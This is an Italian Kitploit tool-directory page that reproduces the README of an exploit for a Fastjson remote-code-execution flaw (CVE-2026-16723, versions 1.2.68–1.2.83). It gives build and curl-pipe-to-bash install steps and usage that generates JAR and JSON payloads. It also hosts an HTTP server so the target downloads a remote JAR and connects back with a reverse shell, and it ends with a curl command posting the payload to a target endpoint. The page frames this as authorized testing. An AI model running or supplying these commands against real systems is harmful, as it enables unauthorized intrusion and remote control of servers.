Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-16723 — Exploit per Fastjson RCE (CVE-2026-16723) che colpisce le versioni dalla 1.2.68 alla 1.2.83. Genera payload JAR e JSON, ospita un server HTTP e stabilisce una reverse shell. | Kitploit
Strumenti/GitHubGitHub/nowafen/cve-2026-16723
Generazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubnowafen/cve-2026-16723

CVE-2026-16723

Exploit per Fastjson RCE (CVE-2026-16723) che colpisce le versioni dalla 1.2.68 alla 1.2.83. Genera payload JAR e JSON, ospita un server HTTP e stabilisce una reverse shell.

Vedi Repository
24 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit CVE-2026-16723

Un'implementazione autonoma in C++17 per CVE-2026-16723, una vulnerabilità critica che colpisce le versioni 1.2.68 – 1.2.83 di Fastjson.


Requisiti

  • Linux (o WSL su Windows)

  • Compilatore compatibile con C++17 (GCC 7+ o Clang 5+)

  • CMake 3.10 o successivo

  • Pacchetti di sistema:

    • libzip-dev
    • zlib1g-dev

Debian / Ubuntu

root@kitploit:~
sudo apt update
sudo apt install -y build-essential cmake libzip-dev zlib1g-dev

Installazione

Installazione rapida (consigliata)

Installa tutto con un singolo comando:

root@kitploit:~
curl -sSL https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh | bash

Oppure scarica ed esegui manualmente l'installer:

root@kitploit:~
wget https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh
chmod +x install.sh
./install.sh

Lo script di installazione:

  • Installa tutti i pacchetti di sistema richiesti.

  • Scarica le librerie header-only richieste:

    • nlohmann/json
    • cpp-httplib
  • Compila il progetto.

  • Posiziona il binario compilato nella directory corrente come:

root@kitploit:~
./exploit

Compilazione manuale

Se hai clonato il repository:

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-16723.git
cd CVE-2026-16723
./install.sh

Oppure compila manualmente:

root@kitploit:~
mkdir build
cd build

cmake ..
make -j$(nproc)

cp exploit ../

Utilizzo

Esegui il binario:

root@kitploit:~
./exploit --lhost <YOUR_IP> --lport <SHELL_PORT> [options]

Esempio

root@kitploit:~
./exploit --lhost 192.168.1.100 --lport 4444 --http-port 8000

Dopo l'esecuzione verranno creati i seguenti file:

root@kitploit:~
x
body.json

Il server HTTP si avvierà sulla porta configurata (default: 8000) e lo strumento attenderà una connessione reverse shell in ingresso.


Invio del Payload

Invia il file body.json generato all'endpoint vulnerabile:

root@kitploit:~
curl -X POST http://<TARGET_IP>:8080/api/products/search \
     -H "Content-Type: application/json" \
     --data-binary @body.json

Se l'applicazione prevede un campo JSON diverso, specificarlo tramite l'opzione --field.


Opzioni della riga di comando


File di output

FileDescrizione
xPayload JAR generato
body.jsonPayload JSON da inviare al target

Note

  • Questo progetto è destinato solo a test di sicurezza autorizzati e a scopo didattico.
  • L'implementazione costringe l'applicazione target a scaricare e caricare un JAR remoto utilizzando i protocolli jar:http e jar:file.
  • Il comando della reverse shell è codificato in Base64 per ridurre i problemi di escaping.

Seguimi su Twitter (X)

  • MNM
Scarica lo strumento
OpzioneDescrizioneDefault
--lhostIndirizzo IP localeObbligatorio
--lportPorta di ascolto reverse shell4444
--http-portPorta del server HTTP8000
--firstPrimo descrittore di file da provare3
--lastUltimo descrittore di file da provare30
--fieldNome del campo JSONfacets
--outdirDirectory di output.
-h, --helpMostra il messaggio di aiuto—